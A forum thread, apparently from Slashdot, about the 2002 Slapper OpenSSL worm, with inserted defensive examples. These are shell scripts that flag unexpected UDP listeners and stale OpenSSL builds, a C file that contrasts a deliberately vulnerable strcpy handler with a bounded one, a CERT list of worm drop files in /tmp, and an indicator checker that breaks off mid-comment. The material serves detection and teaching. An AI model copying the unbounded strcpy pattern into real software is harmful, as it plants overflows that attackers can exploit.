What Causes These Flaws?
by
RAMMS+EIN
·
· Score: 2
Anybody else have the idea that many vulnerabilities are partially due to deficiencies of the programming language used? For example, I believe that C's cumbersome string handling is a major cause of buffer-overrun vulnerabilities. Of course, buffer-overruns and off-by-one errors are programming errors, but I think their frequency at the very least lends legitimacy to programming languages designed to avoid such errors.
As for stack-smashing: I think the stack shouldn't be executable anyway. Since Intel has given us data segments that aren't executable and code segments that aren't writable, at least x86 systems could be invulnerable to these attacks. Well, causing a segmentation fault would still lead to DoS I guess, but at least it wouldn't allow arbitrary code to be executed, which would also prevent worms from spreading. And if the segmentation fault would only terminate the thread that is being attacked, rather than the whole server, even DoS wouldn't be possible anymore - except through flooding, but that's a different story.
Summing up, I think there is reason to reconsider the lower-level components of our systems. Programming errors could to a large extent be avoided by using a language that doesn't allow them, and implementing a more rigid security system at memory manager level could stop certain exploits from working.
-- Please correct me if I got my facts wrong.
Also check your /tmp directory
by
Mr.+Flibble
·
· Score: 2
I have seen variant A and B on my network (I admin about 200 machines, but unfortunately the customers themselves, not I are in charge of patching their systems. I only go in and fix it when the customers realize something is wrong. Sort of a "meta-admin" if you will.)
I have not seen variant C, which I believe uses port 1978. Once the worm hit we blocked all the ports it uses at the router. This mitigated much of the damage, even though the exploit comes in on port 443.
HOWEVER be aware I have seen some attempted backdoor exploits that were not worm based. That is, an apache shell was obtained and someone was in on the system installing extra software and attempting to escalate privileges and crack the root account.
This is far more serious than the worm by itself. Fortunately, all I have seen so far is skript kiddies attempting to install backdoors that don't work because they do not have a rootshell. These backdoors were clearly not part of the regular worm. So other exploits than just the worm itself are out there.
Fortunately this worm is waking my customers up, and the systems are getting patched. (It does not matter how many times I run nessus, and send the customer a report saying "fix this", when I send them a message saying "you have now been hit" they suddenly spring into action, or get me to fix it. Funny how that works.)
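Two posters in this thread describe the same defensive habit from different angles: whovian above is "monitoring all outgoing unaccounted for udp" after seeing the worm's UDP 2002 traffic, and Mr. Flibble blocks the ports the variants use (he believes variant C uses 1978) at the router. As an added example (editor's code, not from the thread), the POSIX shell script below turns "unaccounted-for UDP" into a check you can cron: read the kernel's UDP socket table, convert the hex ports, and report every listener that is not on an allow-list you maintain for that host. The /proc/net/udp snapshot in the demo is constructed sample data, the allow-list is an assumption, and the ports 2002 and 1978 are used only because the posters mention them.

```shell
#!/bin/sh
# Added example, not code from the thread.
# Idea: a worm that opens its own UDP channel shows up as a listening UDP
# socket the host has no business having. Compare the kernel's UDP socket
# table against an allow-list and report anything else.
# Assumptions: Linux /proc/net/udp format (hex "addr:port" in column 2);
# the allow-list is whatever you expect on that host (hypothetical here).
# Ports 2002 and 1978 below are the ones posters in this thread associated
# with the worm variants; they appear only in constructed sample data.

# list_udp_ports PROC_UDP_FILE -> prints each local UDP port in decimal, sorted
list_udp_ports() {
    awk 'NR > 1 { split($2, a, ":"); print a[2] }' "$1" |
    while read -r hex; do printf '%d\n' "0x$hex"; done | sort -un
}

# flag_unexpected_udp PROC_UDP_FILE "PORT PORT ..."
# Prints every listening UDP port not in the allow-list; returns 1 if any.
flag_unexpected_udp() {
    file=$1; allowed=" $2 "; found=0
    for p in $(list_udp_ports "$file"); do
        case "$allowed" in
            *" $p "*) ;;                 # expected service
            *) echo "$p"; found=1 ;;     # unaccounted-for listener
        esac
    done
    return $found
}

# demo_udp_check
# Runs the check on a constructed /proc/net/udp snapshot (not captured from
# a real host): DNS (0x0035=53) and NTP (0x007B=123) are allowed, while
# 0x07D2=2002 and 0x07BA=1978 are not, so those two are printed.
demo_udp_check() {
    snap=$(mktemp)
    cat > "$snap" <<'EOF'
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 10001 2 0 0
   1: 00000000:007B 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 10002 2 0 0
   2: 00000000:07D2 00000000:0000 07 00000000:00000000 00:00000000 00000000    48        0 10003 2 0 0
   3: 00000000:07BA 00000000:0000 07 00000000:00000000 00:00000000 00000000    48        0 10004 2 0 0
EOF
    flag_unexpected_udp "$snap" "53 123" || true
    rm -f "$snap"
}
```

On a live host the call is `flag_unexpected_udp /proc/net/udp "53 123"` with your own list; a non-zero exit from cron is the alert. Note that the uid column in the sample is 48, the web server's user on some distributions: a UDP listener owned by the httpd account rather than root is exactly the kind of thing an apache-level compromise leaves behind, so the owner of each flagged socket is worth reporting too.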
Information and live status about the worm
by
randomErr
·
· Score: 2
Hey all,
Ero Carrera at F-Secure.com asked that I post this for them: "Information and live status about the worm can be found at http://www.f-secure.com/slapper/"
Inner Monologue I wonder if Ero is a guy or a chick? And if it's chick is she like looking, ya know what I mean?
-- You say things that offend me and I can deal with it. Can you?
This proves the Brits were behind slapper. And since the PATRIOT Act allows us to define propagating computer worms as an act of terrorism, I vote that the Bush Administration does what we should have done a long time ago:
... we're starting to catch up with Microsoft in the vital worm-propagation field, where they've been unmatched for years. :-)
Laugh, it's a joke
- sig? who is this sig of which you speak?
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches.
;)
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.
Why bother.
You think this is tied to the popularity increase of Linux in the userbase? The webservers have always been around...
;)
Seems like the gloves are coming off. Perhaps we need a sample of this worm to test its DNA and determine its origins
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
The heat from below can burn your eyes out
I'd say that this looks more like an Apache worm than a Linux worm. It does not seem too bad though, "Get your Apache systems patched and update your antivirus software and you should be fine." (from the Slapper.C article).
This shows that Linux+Apache is so widely accepted that it is a legitimate virus target. Enjoy it!
I wonder how Windows must look then. Yikes!
-- Jim
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
They should have replaced the code for the worm with code that pops up a window that says "Patch your server, you halfwit!"
Maybe the state's highest function is to grind out insoluble problems. (Zelazny, Hall of Mirrors)
I think you're being *way* too paranoid.
What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects, causing buffer overruns and worms?
Almost nil.
Even if they are, the maintainers share the blame for not reviewing them properly.
http://www.cert.org/advisories/CA-2002-27.html
A bank robbery is a different type of intrusion. You cannot threaten a computer to give you access. An armed bank robbery is a failure of humans, not security systems. I'm sure all the cameras and locking mechanisms on doors and vaults at a bank work just fine in an armed robbery. The humans unlock them out of self-preservation and the mechanisms do exactly what they are requested.
Exploiting a vulnerability like this is similar to walking down the alley behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase its security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
Why bother.
What should I look for in my apache logs to see if Im being "hit" by it? Anyone have an example?
your friendly neighborhood AC
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
If you were like me and wondered whether, after the OpenSSL upgrade, you actually patched everything right, you can compile and run this program to find out:
- sslv2-master/openssl-sslv2-master.c
http://cert.uni-stuttgart.de/advisories/openssl
It will connect to your HTTPS server and check it. Unfortunately, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Pbur
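Pbur's question about why the advisory says to recompile, and sjvn's earlier "update to 0.9.6g or higher and relink everything", are two sides of the same check. A program that links libssl dynamically picks up the fixed library the next time it is started (an instance started before the upgrade still has the old code mapped), while one built statically carries its own copy of OpenSSL inside the executable and is not fixed until it is relinked. As an added example (editor's code, not from the thread, from OpenSSL or from the CERT advisory linked above), the POSIX shell script below does the three things a sysadmin wants after the upgrade: compare the `openssl version` line against a minimum without tripping over the letter suffix, find executables that embed an older OpenSSL version string, and list processes still mapping a replaced libssl. The minimum version, the fake "binary" in the demo and the process listing's reliance on Linux /proc are assumptions of the example.

```shell
#!/bin/sh
# Added example, not code from the thread, from OpenSSL or from the CERT
# advisory. Three post-upgrade checks:
#   1. is the installed OpenSSL at or above the fixed release (0.9.6g per the
#      thread) - compare version strings correctly, letters included;
#   2. which executables carry their own copy of an old OpenSSL (static link),
#      since those do not pick up the new shared library and must be relinked;
#   3. which running processes still map a libssl that has been replaced on
#      disk, since those keep the old code until restarted.
# Assumptions: version strings follow the "0.9.6g" pattern; MIN is supplied
# by you; the sample "binary" in the demo is constructed, not a real file.

# ver_key VERSION -> one integer that orders "0.9.6f" < "0.9.6g" < "0.9.7"
# (double-letter suffixes such as "zh" compare by their first letter only)
ver_key() {
    num=${1%%[a-z]*}             # "0.9.6"
    letter=${1#"$num"}           # "g", "" or "g-something"
    letter=${letter%%[^a-z]*}    # keep only the patch letter(s)
    oldifs=$IFS; IFS=.; set -- $num; IFS=$oldifs
    maj=${1:-0}; min=${2:-0}; pat=${3:-0}
    lc=0
    [ -n "$letter" ] && lc=$(printf '%d' "'$letter")
    echo $(( maj * 10000000 + min * 100000 + pat * 1000 + lc ))
}

# openssl_version_ok "OpenSSL 0.9.6f 8 Aug 2002" 0.9.6g
# Takes the full `openssl version` line and a minimum; returns 0 if new enough.
openssl_version_ok() {
    min=$2
    set -- $1                    # $2 becomes the version token
    [ "$(ver_key "$2")" -ge "$(ver_key "$min")" ]
}

# embedded_openssl_versions FILE -> OpenSSL version tokens baked into FILE
# (empty for a program that only links the shared library)
embedded_openssl_versions() {
    tr -c '[:print:]' '\n' < "$1" |
    grep -o 'OpenSSL [0-9][0-9.]*[a-z]*' | awk '{ print $2 }' | sort -u
}

# needs_relink FILE MIN -> 0 (true) if FILE embeds an OpenSSL older than MIN
needs_relink() {
    for v in $(embedded_openssl_versions "$1"); do
        [ "$(ver_key "$v")" -lt "$(ver_key "$2")" ] && return 0
    done
    return 1
}

# running_with_old_libssl -> PIDs whose mapped libssl is marked "(deleted)",
# i.e. started before the library file was replaced (Linux /proc only;
# not exercised by the demo)
running_with_old_libssl() {
    grep -l 'libssl.*(deleted)' /proc/[0-9]*/maps 2>/dev/null |
    awk -F/ '{ print $3 }' | sort -un
}

# demo_static_check -> prints "needs-relink" for a constructed file that
# pretends to be a statically linked program built against 0.9.6b
demo_static_check() {
    f=$(mktemp)
    printf '\177ELF\002\001\001OpenSSL 0.9.6b 9 Jul 2001\001\002padding\n' > "$f"
    if needs_relink "$f" 0.9.6g; then echo needs-relink; else echo ok; fi
    rm -f "$f"
}
```

Typical use: `openssl_version_ok "$(openssl version)" 0.9.6g || echo "library still old"`, then `for f in /usr/sbin/* /usr/local/sbin/*; do needs_relink "$f" 0.9.6g && echo "$f"; done` for the static-link sweep, and `running_with_old_libssl` to find the daemons that need a restart even though the file on disk is already fixed. Binaries that `ldd` shows linking libssl dynamically do not need relinking; the sweep catches the ones `ldd` cannot tell you about.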
Usually it takes at least half an hour to release a patch when a hole is discovered.
This time the patch was a month or so too fast for Slapper.B and C. Does this mean that Open Source gets better and better?
p.s. I hate lame unintuitive virus writers without imagination
Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
> I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.'...
Sheesh, evil *and* a jerk. -- Jade
being a good samaritan. no www prefix so browsers won't auto link it, no http prefix for same reason. please do not convert to hyperlink. digitalsushi.com/chkrootkit.tar.gz will leave up for 24 hours, or when i just cant take the abuse anymore.
slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
To all those who will no doubt post "see, CodeRed can happen to Linux, too" - here is some enlightenment:
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page, around 25,000 Windows hosts are still estimated as CodeRed infected, one year after the event.
According to news.com, at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, prove two things:
a) The Linux world is susceptible to the same generic diseases
b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
Assorted stuff I do sometimes: Lemuria.org
Let's just hope Taco isn't doing too much sys admin work these days because this is really old news. Slapper was spotted over a week ago and the news appeared on LWN at the URL below.
http://www.lwn.net/Articles/10026/
Thanks.
Rather than simply having deleted the page, I wonder if it would have been possible to replace this source code with something else that acted as an "antibody"?
For the newbies, remember that Mac OS X is a UNIX family member, too, and comes with Apache as well. The Mac world is so used to getting only one or two attacks over a year that it could be easy to skip over this one.
Thankfully, Apple thought about their security model, so Mac OS X ships with Apache (known in its System Preferences as Personal Web Sharing) and many other common access features switched off by default.
Switching Personal Web Sharing on can make your Mac just as vulnerable to some, if not all of the effects of this worm (if this or any other worm contains x86-specific code for its payload, little to no effect may occur).
Apple's already addressed these vulnerabilities in their recent Security Updates. You can install them from the Software Update system preference or download them from Apple.
Vos teneo officium eram periculosus ut vos recipero is.
I think that Linux provides the sysadmins with a false sense of security. Most sysadmins think that because they are running Linux, they can't be infected with any viruses and worms. The result of this is that many of these administrators never bother to check about new threats, because they haven't seen anything like this for a while. Normally Linux administrators are more tech-savvy than Windows administrators, but as the Linux GUI improves, one will see a proliferation of not so tech-savvy administrators in the Linux market as well. So be prepared for increasing amounts of damage which such worms can cause.
On the other hand, the administrators of Windows machines, because they are facing a new worm every second day, try to stay up to date with the latest news and patches. Most of them have automatic update wizards running on their machines which download new patches instantly.
In fact I would prefer such an instant update wizard for Linux as well, especially for the Linux running security critical applications, so that even if the system administrator is too lazy to check a news site, he will still come to know about the threat.
And because it will be running on Linux, it will do what it's supposed to do, not "God knows what and Gates knows what" as is the case with the Windows update wizard.
What's under yellowstone?
The exploit is well known and people are aware of it. It's the same thing that Slapper.A and Slapper.B used.
Also, while the article makes much of "thousands" of servers compromised, it ignores the fact that the number of compromised servers is (at least last I saw) in the five digits, and pretty much leveled off to very few new infections.
Similar Windows worms (like Code Red) infected hundreds of thousands of machines, and took much longer to level off. Yes, there are still a lot of computers out there, but UNIX admins are a lot more on top of their machines than Win admins, by these numbers.
May we never see th
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
It has been brought to our attention that several posters on this thread have implied that this viral outbreak is in some way connected to the open source community and their users. Slashdot wishes to reiterate their dogmatic belief: Virus := Bad
OpenSource := Good
Microsoft := Bad
Thus proving that any suggestion of a bug/vulnerability in Linux/Apache is a figment of a deluded imagination and you're most likely Welsh.
And the patch fixes the hole that all variants use.
He said that operating systems will inherently have security holes.
I wonder if he meant that operating systems will inherently have remote security holes? I'm not so sure that's true, if you're using few servers, simpler ones, and ones not written in C.
I don't know why more people don't chroot apache or patch to use chroot(2). It can be a pain at times, but it can't be worse than having to reformat and reinstall the entire OS because you are not sure what was tampered with. I know chroot is not perfect and you can break out of it, but as long as you are careful about what goes in it, you are relatively safe. It would at least keep rootkits away from gcc, which seems to be required for most of these rootkits.
From: Ron DuFresne [mailto:dufresne@winternet.com]
Sent: Tuesday, September 24, 2002 9:54 AM
To: firewalls@isc.org
Subject: Slapper worm redux;
Those folks relying upon security through obscurity might well wish to get
on the ball and fully patch-up;
September 23 VNUNET.COM.
A suspect has been arrested on suspicion of authoring the Slapper worm.
But although the threat of the worm seems to have been short-lived, a new
variant is already set to take up where its predecessor left off. Although
the ISC's 'most attacked ports' chart no longer features Slapper in its
Top 10 a variant, Slapper.B, has been spotted in the wild. Slapper.B has
several subtle differences, but is for the most part an updated version of
its predecessor. Both worms attempt to exploit a known vulnerability in
the Secure Sockets Layer 2.0 (SSLv2) handshake process. The two variants
also carry the same payload, a password-protected backdoor and denial of
service (DoS) capabilities. ISS's Morgan said that with the new variant on
the loose his company had calculated that about 10,000 servers were
probably now infected, and that the network was probably going to be used
for DoS attacks. He added that it was unlikely the original author created
the second worm. "It was significant that source code for the original
Slapper was distributed within the computer underground immediately after
the worm was detected in the wild," he said. Source:
http://www.vnunet.com/News/1135274
--
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
It's called "installed user base".
A linguistic note for Americans and other aliens....
"Slapper" is an EnglishEnglish term for a woman with an easily exploited hole....
Some have been claiming around here that slapper is a "demonstration" that Linux is no better than Windows, maybe worse... Sorry you people but this talk is just about onions and carrots. The fact is that a very similar attack, that happens nearly a year after CodeRed/Nimda carmageddon, shows a huge difference between both worlds.
If anyone takes the care to look at the incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note especially the attacks. In less than 12 hours after Nimda's appearance I had more than 340000 Nimda "visits" on the network I supervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Let me explain the process. You tell me if the analogy fits.
robber:
OpenSSL:
robber:
OpenSSL:
robber:
OpenSSL:
robber:
--- Nothing clever here: move along now...
You're kidding... right?
{look of utter fear from the thought that someone would say something like that and be serious.}
~ kjrose
Yes, I'm going to be joining in the crowds of the "Windows still sucks despite this". And here's my reason why:
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
As a result, the percentage of Linux servers that are actually intended to be servers is FAR greater than the percentage of Windows machines with IIS running that someone is actively maintaining.
As a result, more systems get patched sooner.
For a little dose of reality about Slapper: A friend of mine installed a honeypot on his network, waiting for a Slapper hit so he could check out this new, oh-so-uber threat to our wonderful Linux.
After a few days (might've been as long as a week), Slapper finally hit his machine.
Guess what else hit his machine? Code Red, a year-old Windows worm that made headlines *well over a year ago*, a minimum of 12 CR hits per DAY.
Now, given the Netcraft statistics where Apache has 40-50% of the marketshare of web servers on the 'net - Shouldn't Slapper be hitting more often than Code Red?
But it isn't, because Linux installations are more secure out-of-the-box, and are NOT vulnerable out of the box. One of the main reasons so many Windows machines aren't having IIS patches applied is because the user doesn't even know that IIS is running!
retrorocket.o not found, launch anyway?
Tell me precisely what the difference is, in reality, between the so-called white hats that publish exploit code that allows script kiddies across the world to execute arbitrary code (w/o any modification) on remote machines and the so-called black hat that does the same thing only does not require the same number of script kiddies (because it is self-perpetuating)? Neither necessarily use or commence the attack themselves, but they enable thousands of machines to be hacked just the same. Maybe you can argue that proof of the concept does not require self-perpetuation or the installation of a backdoor (as in the case of the worm), but nor does it require the execution of code that is desirable to the script kiddy (as in the case of many so-called white hat advisories)
I think the idea is that the slapper worm will try to grab something from server X (which it believes to be infected) and it tries to run that. If I replaced what it was expecting with something else, that can't be my fault - an external entity was grabbing code off my servers and executing it, not me.
Perhaps I misread this idea, though?
creation science book
Not all Apache servers run on Linux. Not all Linux systems run Apache. Not all Linux/w Apache has mod_ssl.
I don't speak French.
... and you haven't already patched this months-old hole, hand in your resignation now. There's lots of folks more competent than you who need work.
one might write a wee proggie to sit on UDP port 2002,
Not good enough, I don't think.
I'm seeing remote ports 2140:2144 being used to attempt to connect to port 443.
So, I'm denying port 443 incoming and monitoring all outgoing unaccounted for udp. (Yes, we were infected.)
To-do List: Receive telemarketing call during a tornado warning. Check.
It does very little good to check for a rootkit when all the good GNU stuff in /bin has been trojaned...
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
The job of the sysadmin is to stay on top of what is being revealed as vulnerable and then to act appropriately so as to mitigate risk. Updating packages automatically isn't doing that - what if the repository that apt is hitting has been compromised? What if the new version of package X has other issues that make it less than optimal?
One does not approach being secure by putting one's faith in some tool and hoping it solves everything. The only way to lock down a box is to be vigilant and aware, in my experience.
The problem isn't not having packages automatically updated, but rather that there are sysadmins who are militantly unaware of disclosed vulnerabilities in the software they run. Solve the latter and you don't need the (somewhat short-sighted) former.
We who were living are now dying
With a little patience
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
For those of you who don't recall, the Pinto was a car with a minor flaw - If you bumped into its ass it tended to explode in a fireball.
Ford knew of the problem, and even had a "patch" to fix it (minor design change adding some shielding around the tank if I recall). They chose not to fix the problem because of economics.
The same principle applies to large companies and security patches - If there's no exploit and we don't tell anyone the problem exists, maybe we can get away without investing the time/money (programmers are expen$ive!) in fixing it. Much like Ford, they are gambling that the losses due to the bug/hole/whatever won't be significant enough to hurt their profits long-term.
Software is a business, like any other, and businesses tend to make stupid decisions when they see a way to save a few pennies. They may be wrong (VERY VERY WRONG), but until EVERYONE makes it clear that the "patch it when it gets exploited" mentality hurts their business, the companies will continue doing as they have done.
/~mikeg
No matter how secure Linux claims to be, people should take the perception of default installs being invulnerable out of the box with a huge grain of salt, and give it a good look for anything they can turn off or plug up. The same goes for Windows users, ESPECIALLY for them in my opinion. :) If anything this whole Slapper issue should serve to educate both sides of the Windows vs. Linux debate that security problems exist for everyone no matter what you run.
"I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
And, it's not an Apache worm either. It's an OpenSSL worm that exploits security holes in OpenSSL 0.9.6f and earlier.
While the current generation of Slapper targets only OpenSSL on Linux, it will try its attack on any system. And, with a little code tweaking, the next generation of Slapper could hammer on any OS that uses older versions of OpenSSL such as AIX, Solaris, Windows. In short, pretty much any OS that uses OpenSSL is potentially a victim.
Could you have it? If you're a Unix/Linux admin, use chkroot version 0.37 and up to find out. It's available at:
http://www.chkrootkit.org/
In any case, anyone who uses OpenSSL should update with OpenSSL 0.9.6g or higher ASAP. And, while you're at it, be certain to relink everything since OpenSSL isn't used just by Apache. ISC, for example, used it in their BIND 9.1. Slapper wouldn't hit BIND, but would you care to bet that someone couldn't modify the code to launch a BIND attack--and aren't we all really, really sick of BIND getting bungled?
For more on Slapper, and a listing of patches for many operating systems see:
Slapper: The FUD and the Danger
http://www.practical-tech.com/network/n09
Finally, most of these patches, which would have stopped Slapper dead, were available in late July/early August. Consider it more proof that security is a full time system administrator job.
Steven
While you're right in part about the importance of securing a system, you miss out completely on the importance of defense in depth.
The worst flaw of them all about any security, not just information security, is depending on any one process or action or filter to take care of all attacks. It Won't Work. It Will Fail and when it does, you're hosed. The more defenses in depth you have deployed, the better off you are.
Let me illustrate some of the key design criteria for a modern-day tank (as in main battle tank) to illustrate:
1) Avoid detection.
2) If detected, avoid getting hit.
3) If hit, avoid penetration.
4) If penetrated, minimize damage to equipment and crew.
See what I mean? You have to consider what happens if your defenses fail, and where you would be the most vulnerable, and take additional steps there. Because, you know what? Your defenses will fail. But the more of them you have, the less damage an attacker will be able to do by bringing one down.
(One software company I used to work for would take this to extremes and code X-Files style; "Always assume that the entire world around you has been compromised, that your code is the last piece of code standing! Every piece of data you get, even from within the system, is from somebody who's feeding you bogus or random data, or even lying on purpose to make you fail." But the resulting software had defense in depth.)
Anybody else have the idea that many vulnerabilities are partially due to deficiencies of the programming language used? For example, I believe that C's cumbersome string handling is a major cause of buffer-overrun vulnerabilities. Of course, buffer-overruns and off-by-one errors are programming errors, but I think their frequency at the very least lends legitimacy to programming languages designed to avoid such errors.
As for stack-smashing: I think the stack shouldn't be executable anyway. Since Intel has given us data segments that aren't executable and code segments that aren't writable, at least x86 systems could be invulnerable to these attacks. Well, causing a segmentation fault would still lead to DoS I guess, but at least it wouldn't allow arbitrary code to be executed, which would also prevent worms from spreading. And if the segmentation fault would only terminate the thread that is being attacked, rather than the whole server, even DoS wouldn't be possible anymore - except through flooding, but that's a different story.
Summing up, I think there is reason to reconsider the lower-level components of our systems. Programming errors could to a large extent be avoided by using a language that doesn't allow them, and implementing a more rigid security system at memory manager level could stop certain exploits from working.
Please correct me if I got my facts wrong.
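The two posts above (the one on a libsafe-style libc replacement that refuses to let strcpy() and friends overrun a stack frame, and this one on C string handling as a root cause of overruns) are illustrated by the following added example. It is not code from the thread, from Slapper, or from OpenSSL: the handler names, the 16-byte buffer and the bounded_strcpy() wrapper are assumptions chosen for illustration. The unsafe handler shows the bug class; the safe one shows the check a bounds-aware replacement performs, returning an error instead of writing past the buffer.

```c
/* Added example: an unbounded strcpy() handler beside a length-checked one.
 * Names and buffer size are illustrative assumptions, not Slapper/OpenSSL code. */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16

/* libsafe-style check in miniature: a copy routine that knows the size of
 * its destination and refuses to overflow it. Returns 0 on success, -1 if
 * src (plus its NUL) does not fit in dst. */
int bounded_strcpy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)
        return -1;                  /* would overrun: refuse, don't truncate silently */
    memcpy(dst, src, n + 1);        /* n+1 copies the terminating NUL */
    return 0;
}

/* VULNERABLE: trusts the sender's length. A name of 16 or more bytes writes
 * past buf[] into the saved frame pointer and return address (the classic
 * stack smash). Only ever call this with short input; long input is
 * undefined behaviour, which is exactly the point. */
int handle_name_unsafe(const char *name)
{
    char buf[NAME_LEN];
    strcpy(buf, name);              /* no bound at all */
    return (int)strlen(buf);
}

/* HARDENED: same job, but the copy is bounded by the real buffer size and
 * oversized input is rejected with -1 instead of corrupting the stack. */
int handle_name_safe(const char *name)
{
    char buf[NAME_LEN];
    if (bounded_strcpy(buf, sizeof buf, name) != 0)
        return -1;
    return (int)strlen(buf);
}

int main(void)
{
    /* Constructed sample inputs: one that fits, one that would overrun. */
    const char *ok  = "alice";
    const char *bad = "this-name-is-far-too-long-for-sixteen-bytes";

    printf("safe(ok)  = %d\n", handle_name_safe(ok));    /* 5 */
    printf("safe(bad) = %d\n", handle_name_safe(bad));   /* -1 */
    printf("unsafe(ok) = %d\n", handle_name_unsafe(ok)); /* 3 chars would also be 3 */
    /* handle_name_unsafe(bad) is deliberately NOT called: it smashes the stack. */
    return 0;
}
```

Compiling the unsafe variant with gcc's -fstack-protector and feeding it the long string makes the process abort at function return, which is the same "terminate rather than continue" behaviour the libsafe post describes, just enforced by a canary instead of a wrapped libc call. Neither mechanism fixes the bug; both only turn a remote code execution into a crash, which is why the bounded version is the one to ship.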
Look for the following (from CERT):
/tmp/.uubugtraq
/tmp/.bugtraq.c
/tmp/.bugtraq
/tmp/.unlock.c
/tmp/.update.c
/tmp/.cinik
/tmp/.cinik.c
/tmp/.cinik.go
/tmp/.cinik.goecho
/tmp/.cinik.uu
Variant "A"
Variant "B"
Variant "C"
I have seen variant A and B on my network (I admin about 200 machines, but unfortunately the customers themselves, not I, are in charge of patching their systems. I only go in and fix it when the customers realize something is wrong. Sort of a "meta-admin" if you will.)
I have not seen variant C, which I believe uses port 1978. Once the worm hit we blocked all the ports it uses at the router. This mitigated much of the damage, even though the exploit comes in on port 443.
HOWEVER be aware I have seen some attempted backdoor exploits that were not worm based. That is, an apache shell was obtained and someone was in on the system installing extra software and attempting to escalate privileges and crack the root account.
This is far more serious than the worm by itself. Fortunately, all I have seen so far is skript kiddies attempting to install backdoors that don't work because they do not have a rootshell. These backdoors were clearly not part of the regular worm. So other exploits than just the worm itself are out there.
Fortunately this worm is waking my customers up, and the systems are getting patched. (It does not matter how many times I run nessus, and send the customer a report saying "fix this", when I send them a message saying "you have now been hit" they suddenly spring into action, or get me to fix it. Funny how that works.)
Try to hack my 31337 firewall!
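The post above quotes CERT's list of Slapper drop files and mentions the ports the variants use; earlier posts mention a UDP 2002 listener and connections to port 443 arriving from remote ports 2140-2144. The following added example (not a CERT tool and not code from the thread) turns those indicators into a small host check: it scans for the quoted file names and classifies connection records against the quoted ports. The file-existence test is passed in as a callback so the scan can be exercised against a constructed fake filesystem; the port profile for 1978 (variant C) and the 2140-2144 source-port range are taken from individual posters' observations and are assumptions, not an authoritative signature.

```c
/* Added example: host-side check for the Slapper indicators quoted in the
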